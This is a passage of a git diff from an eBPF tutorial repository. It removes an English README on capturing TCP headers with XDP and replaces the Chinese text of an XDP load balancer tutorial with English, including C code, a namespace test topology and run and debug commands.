0x0800 - -// Define the ring buffer map -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 1 << 24); // 16 MB buffer -} rb SEC(".maps"); - -// Helper function to check if the packet is TCP -static bool is_tcp(struct ethhdr *eth, void *data_end) -{ - // Ensure Ethernet header is within bounds - if ((void *)(eth + 1) > data_end) - return false; - - // Only handle IPv4 packets - if (bpf_ntohs(eth->h_proto) != ETH_P_IP) - return false; - - struct iphdr *ip = (struct iphdr *)(eth + 1); - - // Ensure IP header is within bounds - if ((void *)(ip + 1) > data_end) - return false; - - // Check if the protocol is TCP - if (ip->protocol != IPPROTO_TCP) - return false; - - return true; -} - -SEC("xdp") -int xdp_pass(struct xdp_md *ctx) -{ - // Pointers to packet data - void *data = (void *)(long)ctx->data; - void *data_end = (void *)(long)ctx->data_end; - - // Parse Ethernet header - struct ethhdr *eth = data; - - // Check if the packet is a TCP packet - if (!is_tcp(eth, data_end)) { - return XDP_PASS; - } - - // Cast to IP header - struct iphdr *ip = (struct iphdr *)(eth + 1); - - // Calculate IP header length - int ip_hdr_len = ip->ihl * 4; - if (ip_hdr_len < sizeof(struct iphdr)) { - return XDP_PASS; - } - - // Ensure IP header is within packet bounds - if ((void *)ip + ip_hdr_len > data_end) { - return XDP_PASS; - } - - // Parse TCP header - struct tcphdr *tcp = (struct tcphdr *)((unsigned char *)ip + ip_hdr_len); - - // Ensure TCP header is within packet bounds - if ((void *)(tcp + 1) > data_end) { - return XDP_PASS; - } - - // Define the number of bytes you want to capture from the TCP header - const int tcp_header_bytes = 32; - - // Ensure that the desired number of bytes does not exceed packet bounds - if ((void *)tcp + tcp_header_bytes > data_end) { - return XDP_PASS; - } - - // Reserve space in the ring buffer - void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); - if (!ringbuf_space) { - return XDP_PASS; // If reservation fails, skip processing - } - - // Copy the TCP header bytes into the ring buffer - // Using a loop to ensure compliance with eBPF verifier - for (int i = 0; i < tcp_header_bytes; i++) { - unsigned char byte = *((unsigned char *)tcp + i); - ((unsigned char *)ringbuf_space)[i] = byte; - } - - // Submit the data to the ring buffer - bpf_ringbuf_submit(ringbuf_space, 0); - - // Optional: Print a debug message - bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); - - return XDP_PASS; -} - -char __license[] SEC("license") = "GPL"; -``` - -### Code Explanation - -#### Defining the Ring Buffer Map - -We define a ring buffer map named `rb` to pass data from the kernel to user space efficiently. - -```c -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 1 << 24); // 16 MB buffer -} rb SEC(".maps"); -``` - -#### Packet Parsing and Validation - -The `is_tcp` helper function checks whether the incoming packet is a TCP packet by verifying the Ethernet and IP headers. - -```c -static bool is_tcp(struct ethhdr *eth, void *data_end) -{ - // ... (checks omitted for brevity) -} -``` - -#### Capturing TCP Header Information - -In the `xdp_pass` function, we: - -1. Parse the Ethernet, IP, and TCP headers. -2. Ensure all headers are within the packet bounds to prevent invalid memory access. -3. Reserve space in the ring buffer to store the TCP header. -4. Copy the TCP header bytes into the ring buffer. -5. Submit the data to the ring buffer for user-space consumption. - -```c -// Reserve space in the ring buffer -void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); -if (!ringbuf_space) { - return XDP_PASS; -} - -// Copy the TCP header bytes -for (int i = 0; i < tcp_header_bytes; i++) { - unsigned char byte = *((unsigned char *)tcp + i); - ((unsigned char *)ringbuf_space)[i] = byte; -} - -// Submit to ring buffer -bpf_ringbuf_submit(ringbuf_space, 0); -``` - -#### Using bpf_printk for Debugging - -The `bpf_printk` function logs messages to the kernel's trace pipe, which can be invaluable for debugging. - -```c -bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); -``` - -## User-Space Code Analysis - -Let's examine the user-space program that reads the captured TCP headers from the ring buffer and displays them. - -### Full User-Space Code - -```c -#include -#include -#include -#include -#include -#include - -#include -#include - -#include "xdp-tcpdump.skel.h" // Generated skeleton header - -// Callback function to handle events from the ring buffer -static int handle_event(void *ctx, void *data, size_t data_sz) -{ - if (data_sz < 20) { // Minimum TCP header size - fprintf(stderr, "Received incomplete TCP header\n"); - return 0; - } - - // Parse the raw TCP header bytes - struct tcphdr { - uint16_t source; - uint16_t dest; - uint32_t seq; - uint32_t ack_seq; - uint16_t res1:4, - doff:4, - fin:1, - syn:1, - rst:1, - psh:1, - ack:1, - urg:1, - ece:1, - cwr:1; - uint16_t window; - uint16_t check; - uint16_t urg_ptr; - // Options and padding may follow - } __attribute__((packed)); - - if (data_sz < sizeof(struct tcphdr)) { - fprintf(stderr, "Data size (%zu) less than TCP header size\n", data_sz); - return 0; - } - - struct tcphdr *tcp = (struct tcphdr *)data; - - // Convert fields from network byte order to host byte order - uint16_t source_port = ntohs(tcp->source); - uint16_t dest_port = ntohs(tcp->dest); - uint32_t seq = ntohl(tcp->seq); - uint32_t ack_seq = ntohl(tcp->ack_seq); - uint16_t window = ntohs(tcp->window); - - // Extract flags - uint8_t flags = 0; - flags |= (tcp->fin) ? 0x01 : 0x00; - flags |= (tcp->syn) ? 0x02 : 0x00; - flags |= (tcp->rst) ? 0x04 : 0x00; - flags |= (tcp->psh) ? 0x08 : 0x00; - flags |= (tcp->ack) ? 0x10 : 0x00; - flags |= (tcp->urg) ? 0x20 : 0x00; - flags |= (tcp->ece) ? 0x40 : 0x00; - flags |= (tcp->cwr) ? 0x80 : 0x00; - - printf("Captured TCP Header:\n"); - printf(" Source Port: %u\n", source_port); - printf(" Destination Port: %u\n", dest_port); - printf(" Sequence Number: %u\n", seq); - printf(" Acknowledgment Number: %u\n", ack_seq); - printf(" Data Offset: %u\n", tcp->doff); - printf(" Flags: 0x%02x\n", flags); - printf(" Window Size: %u\n", window); - printf("\n"); - - return 0; -} - -int main(int argc, char **argv) -{ - struct xdp_tcpdump_bpf *skel; - struct ring_buffer *rb = NULL; - int ifindex; - int err; - - if (argc != 2) - { - fprintf(stderr, "Usage: %s \n", argv[0]); - return 1; - } - - const char *ifname = argv[1]; - ifindex = if_nametoindex(ifname); - if (ifindex == 0) - { - fprintf(stderr, "Invalid interface name %s\n", ifname); - return 1; - } - - /* Open and load BPF application */ - skel = xdp_tcpdump_bpf__open(); - if (!skel) - { - fprintf(stderr, "Failed to open BPF skeleton\n"); - return 1; - } - - /* Load & verify BPF programs */ - err = xdp_tcpdump_bpf__load(skel); - if (err) - { - fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); - goto cleanup; - } - - /* Attach XDP program */ - err = xdp_tcpdump_bpf__attach(skel); - if (err) - { - fprintf(stderr, "Failed to attach BPF skeleton: %d\n", err); - goto cleanup; - } - - /* Attach the XDP program to the specified interface */ - skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); - if (!skel->links.xdp_pass) - { - err = -errno; - fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); - goto cleanup; - } - - printf("Successfully attached XDP program to interface %s\n", ifname); - - /* Set up ring buffer polling */ - rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); - if (!rb) - { - fprintf(stderr, "Failed to create ring buffer\n"); - err = -1; - goto cleanup; - } - - printf("Start polling ring buffer\n"); - - /* Poll the ring buffer */ - while (1) - { - err = ring_buffer__poll(rb, -1); - if (err == -EINTR) - continue; - if (err < 0) - { - fprintf(stderr, "Error polling ring buffer: %d\n", err); - break; - } - } - -cleanup: - ring_buffer__free(rb); - xdp_tcpdump_bpf__destroy(skel); - return -err; -} -``` - -### Code Explanation - -#### Handling Ring Buffer Events - -The `handle_event` function processes TCP header data received from the ring buffer. - -```c -static int handle_event(void *ctx, void *data, size_t data_sz) -{ - // Validate data size - if (data_sz < 20) { - fprintf(stderr, "Received incomplete TCP header\n"); - return 0; - } - - // Parse the TCP header - // ... (parsing code) -} -``` - -#### Parsing the TCP Header - -We define a local `tcphdr` structure to interpret the raw bytes. - -```c -struct tcphdr { - uint16_t source; - uint16_t dest; - uint32_t seq; - uint32_t ack_seq; - // ... (other fields) -} __attribute__((packed)); -``` - -#### Displaying Captured Information - -After parsing, we print the TCP header fields in a readable format. - -```c -printf("Captured TCP Header:\n"); -printf(" Source Port: %u\n", source_port); -printf(" Destination Port: %u\n", dest_port); -// ... (other fields) -``` - -#### Setting Up the eBPF Skeleton - -We use the generated skeleton `xdp-tcpdump.skel.h` to load and attach the eBPF program. - -```c -/* Open and load BPF application */ -skel = xdp_tcpdump_bpf__open(); -if (!skel) { - fprintf(stderr, "Failed to open BPF skeleton\n"); - return 1; -} - -/* Load & verify BPF programs */ -err = xdp_tcpdump_bpf__load(skel); -if (err) { - fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); - goto cleanup; -} -``` - -#### Attaching to the Network Interface - -We attach the XDP program to the specified network interface by name. - -```c -skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); -if (!skel->links.xdp_pass) { - err = -errno; - fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); - goto cleanup; -} -``` - -## Compilation and Execution Instructions - -### Prerequisites - -- A Linux system with a kernel version that supports eBPF and XDP. -- libbpf library installed. -- Compiler with eBPF support (clang). - -### Building the Program - -Assuming you have cloned the repository from [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial), navigate to the `bpf-developer-tutorial/src/41-xdp-tcpdump` directory. - -```bash -cd bpf-developer-tutorial/src/41-xdp-tcpdump -make -``` - -This command compiles both the kernel eBPF code and the user-space application. - -### Running the Program - -First, identify your network interfaces: - -```bash -ifconfig -``` - -Sample output: - -``` -wlp0s20f3: flags=4163 mtu 1500 - inet 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 - ether 00:1a:2b:3c:4d:5e txqueuelen 1000 (Ethernet) -``` - -Run the user-space program with the desired network interface: - -```bash -sudo ./xdp-tcpdump wlp0s20f3 -``` - -Sample output: - -``` -Successfully attached XDP program to interface wlp0s20f3 -Start polling ring buffer -Captured TCP Header: - Source Port: 443 - Destination Port: 53500 - Sequence Number: 572012449 - Acknowledgment Number: 380198588 - Data Offset: 8 - Flags: 0x10 - Window Size: 16380 -``` - -### Complete Source Code and Resources - -- **Source Code Repository:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) -- **Tutorial Website:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) - -## Summary and Conclusion - -In this tutorial, we explored how to use eBPF and XDP to capture TCP header information directly within the Linux kernel. By analyzing both the kernel eBPF code and the user-space application, we learned how to intercept packets, extract essential TCP fields, and communicate this data to user space efficiently using a ring buffer. - -This approach offers a high-performance alternative to traditional packet capturing methods, with minimal impact on system resources. It's a powerful technique for network monitoring, security analysis, and debugging. - -If you would like to learn more about eBPF, visit our tutorial code repository at or our website at . - -Happy coding! diff --git a/src/42-xdp-loadbalancer/README.md b/src/42-xdp-loadbalancer/README.md index 06fc527..c792e8f 100644 --- a/src/42-xdp-loadbalancer/README.md +++ b/src/42-xdp-loadbalancer/README.md @@ -1,44 +1,45 @@ -# eBPF 开发者教程: 简单的 XDP 负载均衡器 -在本教程中,我们将指导您如何使用eBPF(扩展的Berkeley Packet Filter)实现一个简单的XDP(eXpress Data Path)负载均衡器。只需使用C语言和libbpf库,无需外部依赖,这是一个适合开发者的实践指南,帮助您充分利用Linux内核的强大功能来构建高效的网络应用程序。 +# eBPF Developer Tutorial: XDP Load Balancer -## 为什么选择XDP? +In this tutorial, we will guide you through the process of implementing a simple XDP (eXpress Data Path) load balancer using eBPF (Extended Berkeley Packet Filter). With just C, libbpf, and no external dependencies, this hands-on guide is perfect for developers interested in harnessing the full power of the Linux kernel to build highly efficient network applications. -`XDP`(eXpress Data Path)是Linux中的一个高速、内核级网络框架,它允许在网络堆栈的最早阶段,即在网络接口卡(NIC)上处理数据包。这使得XDP可以进行超低延迟和高吞吐量的数据包处理,非常适合用于负载均衡、DDoS保护和流量过滤等任务。 +## Why XDP? -XDP的关键特性: +`XDP` (eXpress Data Path) is a fast, in-kernel networking framework in Linux that allows packet processing at the earliest point in the network stack, right in the network interface card (NIC). This enables ultra-low-latency and high-throughput packet handling, making XDP ideal for tasks like load balancing, DDoS protection, and traffic filtering. -1. **快速数据包处理**:XDP直接在网络接口卡(NIC)级别处理数据包,减少了延迟,并通过避免通常的网络堆栈开销来提高性能。 -2. **高效**:由于在数据包进入内核之前处理它们,XDP最大限度地减少了CPU使用率,能够在高流量负载下保持系统的快速响应。 -3. **可定制的eBPF**:XDP程序使用eBPF编写,允许您为特定的用例创建自定义的数据包处理逻辑,例如丢弃、重定向或转发数据包。 -4. **低CPU开销**:支持零拷贝数据包转发,XDP占用更少的系统资源,非常适合在最少CPU负载的情况下处理高流量。 -5. **简单操作**:XDP程序返回预定义的操作,例如丢弃、通过或重定向数据包,提供对流量处理的控制。 +Key Features of XDP -### 使用XDP的项目 +1. **Fast Packet Processing**: XDP handles packets directly at the NIC level, reducing latency and improving performance by avoiding the usual networking stack overhead. +2. **Efficient**: Because it processes packets before they reach the kernel, XDP minimizes CPU usage and handles high traffic loads without slowing down the system. +3. **Customizable with eBPF**: XDP programs are written using eBPF, allowing you to create custom packet-handling logic for specific use cases like dropping, redirecting, or forwarding packets. +4. **Low CPU Overhead**: With support for zero-copy packet forwarding, XDP uses fewer system resources, making it perfect for handling high traffic with minimal CPU load. +5. **Simple Actions**: XDP programs return predefined actions like dropping, passing, or redirecting packets, providing control over how traffic is handled. -- `Cilium` 是一个为云原生环境(如Kubernetes)设计的开源网络工具。它使用XDP高效处理数据包过滤和负载均衡,提升了高流量网络中的性能。 -- `Katran` 由Facebook开发,是一个负载均衡器,它使用XDP处理数百万的连接,且CPU使用率低。它高效地将流量分发到服务器,在Facebook内部被用于大规模的网络环境。 -- `Cloudflare` 使用XDP来防御DDoS攻击。通过在NIC级别过滤恶意流量,Cloudflare可以在攻击数据包进入内核之前将其丢弃,最大限度地减少对网络的影响。 +Projects That Use XDP -### 为什么选择XDP而不是其他方法? +- `Cilium` is an open-source networking tool for cloud-native environments like Kubernetes. It uses XDP to efficiently handle packet filtering and load balancing, improving performance in high-traffic networks. +- `Katran`, developed by Facebook, is a load balancer that uses XDP to handle millions of connections with low CPU usage. It distributes traffic efficiently across servers and is used internally at Facebook for large-scale networking. +- `Cloudflare` uses XDP to protect against DDoS attacks. By filtering out malicious traffic at the NIC level, Cloudflare can drop attack packets before they even reach the kernel, minimizing the impact on their network. -与传统工具如`iptables`或`tc`相比,XDP具有以下优势: +### Why Choose XDP Over Other Methods? -- **速度**:它直接在NIC驱动程序中操作,数据包处理速度远快于传统方法。 -- **灵活性**:通过eBPF,您可以编写自定义的数据包处理逻辑,以满足特定需求。 -- **效率**:XDP使用更少的资源,非常适合需要处理高流量而不使系统过载的环境。 +Compared to traditional tools like `iptables` or `tc`, XDP offers: -## 项目:构建一个简单的负载均衡器 +- **Speed**: It operates directly in the NIC driver, processing packets much faster than traditional methods. +- **Flexibility**: With eBPF, you can write custom packet-handling logic to meet specific needs. +- **Efficiency**: XDP uses fewer resources, making it suitable for environments that need to handle high traffic without overloading the system. -在本项目中,我们将专注于使用XDP构建一个负载均衡器。负载均衡器通过将传入的网络流量高效地分发到多个后端服务器,防止单个服务器过载。结合XDP和eBPF,我们可以构建一个运行在Linux网络堆栈边缘的负载均衡器,确保即使在高流量情况下也能保持高性能。 +## The Project: Building a Simple Load Balancer -我们将实现的负载均衡器将具备以下功能: +In this project, we will be focusing on building a load balancer using XDP. A load balancer efficiently distributes incoming network traffic across multiple backend servers to prevent any single server from becoming overwhelmed. With the combination of XDP and eBPF, we can build a load balancer that operates at the edge of the Linux networking stack, ensuring high performance even under heavy traffic conditions. -- 监听传入的网络数据包。 -- 根据数据包的源IP和端口计算哈希值,从而将流量分发到多个后端服务器。 -- 根据计算出的哈希值将数据包转发到相应的后端服务器。 +The load balancer we’ll be implementing will: -我们将保持设计简单但强大,向您展示如何利用eBPF的能力来创建一个轻量级的负载均衡解决方案。 +- Listen for incoming network packets. +- Calculate a hash based on the packet's source IP and port, allowing us to distribute the traffic across multiple backend servers. +- Forward the packet to the appropriate backend server based on the calculated hash. + +We'll keep the design simple but powerful, showing you how to leverage eBPF’s capabilities to create a lightweight load balancing solution. ## kernel eBPF code @@ -162,13 +163,13 @@ int xdp_load_balancer(struct xdp_md *ctx) { char _license[] SEC("license") = "GPL"; ``` -## 内核代码关键部分解读 +Here’s a breakdown of the key sections of the kernel code for your blog: -### 1. **头文件和数据结构** +### 1. **Header Files and Data Structures** -代码首先包含了一些必要的头文件,例如 ``、``、`` 等。这些头文件提供了处理以太网帧、IP 数据包以及 BPF 辅助函数的定义。 +The code begins with necessary header files like ``, ``, ``, and more. These headers provide definitions for handling Ethernet frames, IP packets, and BPF helper functions. -`backend_config` 结构体被定义用于存储后端服务器的 IP 和 MAC 地址。这将在负载均衡逻辑中用于根据流量分配规则路由数据包。 +The `backend_config` struct is defined to hold the IP and MAC address of backend servers. This will later be used for routing packets based on load balancing logic. ```c struct backend_config { @@ -177,9 +178,9 @@ struct backend_config { }; ``` -### 2. **后端和负载均衡器配置** +### 2. **Backend and Load Balancer Configuration** -代码定义了一个名为 `backends` 的 eBPF map,用于存储两个后端的 IP 和 MAC 地址。`BPF_MAP_TYPE_ARRAY` 类型用于存储后端的配置信息,`max_entries` 设置为 2,表示该负载均衡器将把流量分配给两个后端服务器。 +The code defines an eBPF map named `backends` that stores IP and MAC addresses for two backends. The `BPF_MAP_TYPE_ARRAY` type is used to store backend configuration, with `max_entries` set to 2, indicating the load balancer will route to two backend servers. ```c struct { @@ -190,7 +191,7 @@ struct { } backends SEC(".maps"); ``` -同时也预定义了客户端和负载均衡器的 IP 地址和 MAC 地址: +There are also predefined IP addresses and MAC addresses for the client and load balancer: ```c int client_ip = bpf_htonl(0xa000001); @@ -199,9 +200,9 @@ int load_balancer_ip = bpf_htonl(0xa00000a); unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; ``` -### 3. **校验和函数** +### 3. **Checksum Functions** -`iph_csum()` 函数在修改数据包内容后重新计算 IP 头的校验和。在对头部进行任何修改时,确保 IP 数据包的完整性是至关重要的。 +The function `iph_csum()` recalculates the IP header checksum after modifying the packet's contents. It's essential to keep the integrity of IP packets when any modification is done to the headers. ```c static __always_inline __u16 iph_csum(struct iphdr *iph) { @@ -211,12 +212,12 @@ static __always_inline __u16 iph_csum(struct iphdr *iph) { } ``` -### 4. **XDP 程序逻辑** +### 4. **XDP Program Logic** -XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该函数附加到 XDP 钩子上。它处理传入的数据包,并根据不同情况将数据包转发到后端或回传给客户端。 +The core of the XDP load balancer logic is implemented in the `xdp_load_balancer` function, which is attached to the XDP hook. It processes incoming packets and directs them either to a backend or back to the client. -- **初始检查**: - 函数首先验证数据包是否是以太网帧,接着检查它是否是 IP 数据包(IPv4)并且使用了 TCP 协议。 +- **Initial Checks**: + The function begins by verifying that the packet is an Ethernet frame, then checks if it's an IP packet (IPv4) and if it's using the TCP protocol. ```c if (eth->h_proto != __constant_htons(ETH_P_IP)) @@ -225,8 +226,8 @@ XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该 return XDP_PASS; ``` -- **客户端数据包处理**: - 如果源 IP 与客户端 IP 匹配,代码使用 `xxhash32` 对 IP 头进行哈希处理,以确定相应的后端(基于 key 对 2 取模)。 +- **Client Packet Handling**: + If the source IP matches the client IP, the code hashes the IP header using `xxhash32` to determine the appropriate backend (based on the key modulo 2). ```c if (iph->saddr == client_ip) { @@ -234,44 +235,43 @@ XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该 struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); ``` - 之后将目标 IP 和 MAC 替换为选定的后端的值,并将数据包转发到后端。 + The destination IP and MAC are replaced with those of the selected backend, and the packet is forwarded to the backend. -- **后端数据包处理**: - 如果数据包来自后端服务器,代码将目标设置为客户端的 IP 和 MAC 地址,确保后端的响应数据包被正确地转发回客户端。 +- **Backend Packet Handling**: + If the packet is from a backend server, the destination is set to the client’s IP and MAC address, ensuring that the backend’s response is directed back to the client. ```c iph->daddr = client_ip; __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); ``` -- **重写 IP 和 MAC 地址**: - 对于所有的出站数据包,源 IP 和 MAC 地址会被更新为负载均衡器的值,以确保在客户端与后端之间通信时,负载均衡器作为源进行标识。 +- **Rewriting IP and MAC Addresses**: + The source IP and MAC are updated to the load balancer’s values for all outgoing packets, ensuring that the load balancer appears as the source for both client-to-backend and backend-to-client communication. ```c iph->saddr = load_balancer_ip; __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); ``` -- **重新计算校验和**: - 修改 IP 头之后,使用之前定义的 `iph_csum()` 函数重新计算校验和。 +- **Recalculate Checksum**: + After modifying the IP header, the checksum is recalculated using the previously defined `iph_csum()` function. ```c iph->check = iph_csum(iph); ``` -- **最终动作**: - 使用 `XDP_TX` 动作发送数据包,这指示网卡将修改后的数据包传输出去。 +- **Final Action**: + The packet is transmitted using the `XDP_TX` action, which instructs the NIC to send the modified packet. ```c return XDP_TX; ``` -### 5. **结论** +### 5. **Conclusion** -在这部分博客中,可以解释负载均衡器是如何通过检查源 IP、进行哈希计算来分配流量,并通过修改目标 IP 和 MAC 来确保数据包的转发。`XDP_TX` 动作是实现 eBPF 在 XDP 层中高速数据包处理的关键。 - -这一解释可以帮助读者理解数据包的流转过程,以及代码中每个部分在实现多个后端之间负载均衡的过程中所起的作用。 +This part of the blog could explain how the load balancer ensures traffic is efficiently routed between the client and two backend servers by inspecting the source IP, hashing it for load distribution, and modifying the destination IP and MAC before forwarding the packet. The `XDP_TX` action is key to the high-speed packet handling provided by eBPF in the XDP layer. +This explanation can help readers understand the flow of the packet and the role of each section of the code in managing load balancing across multiple backends. ## Userspace code @@ -374,35 +374,33 @@ int main(int argc, char **argv) { } ``` -### 用户空间代码概述 +The userspace code provided is responsible for setting up and configuring the XDP load balancer program that runs in the kernel. It accepts command-line arguments, loads the eBPF program, attaches it to a network interface, and updates the backend configurations. -提供的用户空间代码负责设置和配置在内核中运行的 XDP 负载均衡器程序。它接受命令行参数,加载 eBPF 程序,将其附加到网络接口,并更新后端服务器的配置信息。 +### 1. **Argument Parsing and Backend Setup** -### 1. **解析命令行参数和设置后端服务器** +The program expects five command-line arguments: the name of the network interface (`ifname`), the IP addresses and MAC addresses of two backend servers. It then parses the IP addresses using `inet_pton()` and the MAC addresses using the `parse_mac()` function, which ensures that the format of the provided MAC addresses is correct. The parsed backend information is stored in a `backend_config` structure. -程序期望五个命令行参数:网络接口的名称 (`ifname`)、两个后端服务器的 IP 地址和 MAC 地址。它通过 `inet_pton()` 函数解析 IP 地址,并使用 `parse_mac()` 函数解析 MAC 地址,确保提供的 MAC 地址格式正确。解析后的后端信息存储在 `backend_config` 结构体中。 +### 2. **Loading and Attaching the BPF Program** -### 2. **加载并附加 BPF 程序** +The BPF skeleton (generated via `xdp_lb.skel.h`) is used to open and load the XDP program into the kernel. The program then identifies the network interface by converting the interface name into an index using `if_nametoindex()`. Afterward, it attaches the loaded BPF program to this interface using `bpf_program__attach_xdp()`. -BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加载到内核中。程序通过 `if_nametoindex()` 将网络接口名称转换为索引,然后使用 `bpf_program__attach_xdp()` 将加载的 BPF 程序附加到此接口上。 +### 3. **Configuring Backend Information** -### 3. **配置后端服务器信息** +The backend IP and MAC addresses are written to the `backends` BPF map using `bpf_map_update_elem()`. This step ensures that the BPF program has access to the backend configurations, allowing it to route packets to the correct backend servers based on the logic in the kernel code. -后端的 IP 和 MAC 地址被写入 `backends` BPF map 中,使用 `bpf_map_update_elem()` 函数。此步骤确保 BPF 程序能够访问后端配置,从而基于内核代码中的逻辑将数据包路由到正确的后端服务器。 +### 4. **Program Loop and Cleanup** -### 4. **程序循环与清理** +The program enters an infinite loop (`while (1) { sleep(1); }`) to keep running, allowing the XDP program to continue functioning. When the user decides to exit by pressing Ctrl+C, the BPF program is detached from the network interface, and resources are cleaned up by calling `xdp_lb_bpf__destroy()`. -程序进入无限循环(`while (1) { sleep(1); }`),使 XDP 程序保持运行。当用户通过按下 Ctrl+C 退出时,BPF 程序从网络接口上卸载,并通过调用 `xdp_lb_bpf__destroy()` 清理资源。 +In summary, this userspace code is responsible for configuring and managing the lifecycle of the XDP load balancer, making it easy to update backend configurations dynamically and ensuring the load balancer is correctly attached to a network interface. -总的来说,这段用户空间代码负责配置和管理 XDP 负载均衡器的生命周期,使得可以动态更新后端配置,并确保负载均衡器正确附加到网络接口上。 +## The topology of test environment -### 测试环境拓扑 - -拓扑结构表示一个测试环境,其中本地机器通过负载均衡器与两个后端节点(h2 和 h3)通信。通过虚拟以太网对(veth0 到 veth6),本地机器与负载均衡器相连,在受控环境中模拟网络连接。每个虚拟接口都有自己的 IP 和 MAC 地址,代表不同的实体。 +The topology represents a test environment where a local machine communicates with two backend nodes (h2 and h3) through a load balancer. The local machine is connected to the load balancer via virtual Ethernet pairs (veth0 to veth6), simulating network connections in a controlled environment. Each virtual interface has its own IP and MAC address to represent different entities. ```txt +---------------------------+ - | 本地机器 | + | Local Machine | | IP: 10.0.0.1 (veth0) | | MAC: DE:AD:BE:EF:00:01 | +------------+---------------+ @@ -410,7 +408,7 @@ BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加 | (veth1) | +--------+---------------+ - | 负载均衡器 | + | Load Balancer | | IP: 10.0.0.10 (veth6) | | MAC: DE:AD:BE:EF:00:10| +--------+---------------+ @@ -428,31 +426,31 @@ BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加 +------------------+ +------------------+ ``` -这个设置可以通过脚本(`setup.sh`)轻松初始化,并通过另一个脚本(`teardown.sh`)删除。 +The setup can be easily initialized with a script (setup.sh), and removed with a teardown script (teardown.sh). -> 如果您对本教程感兴趣,请帮助我们创建一个容器化的版本,简化设置和拓扑结构!目前的设置和删除过程基于网络命名空间,容器化的版本会更加友好。 +> If you are interested in this tutorial, please help us create a containerized version of the setup and topology! Currently the setup and teardown are based on the network namespace, it will be more friendly to have a containerized version of the setup and topology. -初始化: +Setup: ```sh sudo ./setup.sh ``` -删除: +Teardown: ```sh sudo ./teardown.sh ``` -### 运行负载均衡器 +### Running the Load Balancer -要运行 XDP 负载均衡器,执行以下命令,指定接口和后端服务器的 IP 和 MAC 地址: +To run the XDP load balancer, execute the following command, specifying the interface and backends' IP and MAC addresses: ```console sudo ip netns exec lb ./xdp_lb veth6 10.0.0.2 de:ad:be:ef:00:02 10.0.0.3 de:ad:be:ef:00:03 ``` -这将配置负载均衡器并输出后端服务器的详细信息: +This will configure the load balancer and print the details of the backends: ```console XDP load balancer configured with backends: @@ -461,67 +459,70 @@ Backend 2 - IP: 10.0.0.3, MAC: de:ad:be:ef:00:03 Press Ctrl+C to exit... ``` -### 测试设置 +### Testing the Setup -您可以通过在两个后端命名空间(`h2` 和 `h3`)启动 HTTP 服务器,并从本地机器向负载均衡器发送请求来测试设置: +You can test the setup by starting HTTP servers on the two backend namespaces (`h2` and `h3`) and sending requests from the local machine to the load balancer: -在 `h2` 和 `h3` 上启动服务器: +Start servers on `h2` and `h3`: ```sh sudo ip netns exec h2 python3 -m http.server sudo ip netns exec h3 python3 -m http.server ``` -然后,向负载均衡器 IP 发送请求: +Then, send a request to the load balancer IP: ```sh curl 10.0.0.10:8000 ``` -负载均衡器将根据哈希函数将流量分配到后端服务器(`h2` 和 `h3`)。 +The load balancer will distribute traffic to the backends (`h2` and `h3`) based on the hashing function. -### 使用 `bpf_printk` 进行监控 +### Monitoring with `bpf_printk` -您可以通过查看 `bpf_printk` 日志来监控负载均衡器的活动。BPF 程序在处理每个数据包时会打印诊断消息。您可以使用以下命令查看这些日志: +You can monitor the load balancer's activity by checking the `bpf_printk` logs. The BPF program prints diagnostic messages whenever a packet is processed. You can view these logs using: ```console sudo cat /sys/kernel/debug/tracing/trace_pipe ``` -日志示例: +Example output: ```console -0 [004] ..s2. 24174.812722: bpf_trace_printk: xdp_load_balancer received packet -0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Source IP: 0xa000001 --0 [004] .Ns2. 24174.812729: Received Destination IP: 0xa00000a --0 [004] .Ns2. 24174.812731: Received Source MAC: de:ad:be:ef:0:1 --0 [004] .Ns2. 24174.812732: Received Destination MAC: de:ad:be:ef:0:10 --0 [004] .Ns2. 24174.812732: Packet from client +-0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Destination IP: 0xa00000a +-0 [004] .Ns2. 24174.812731: bpf_trace_printk: Received Source MAC: de:ad:be:ef:0:1 +-0 [004] .Ns2. 24174.812732: bpf_trace_printk: Received Destination MAC: de:ad:be:ef:0:10 +-0 [004] .Ns2. 24174.812732: bpf_trace_printk: Packet from client -0 [004] .Ns2. 24174.812734: bpf_trace_printk: Redirecting packet to new IP 0xa000002 from IP 0xa00000a --0 [004] .Ns2. 24174.812735: New Dest MAC: de:ad:be:ef:0:2 --0 [004] .Ns2. 24174.812735: New Source MAC: de:ad:be:ef:0:10 +-0 [004] .Ns2. 24174.812735: bpf_trace_printk: New Dest MAC: de:ad:be:ef:0:2 +-0 [004] .Ns2. 24174.812735: bpf_trace_printk: New Source MAC: de:ad:be:ef:0:10 ``` -### 调试问题 +### Debugging Issues 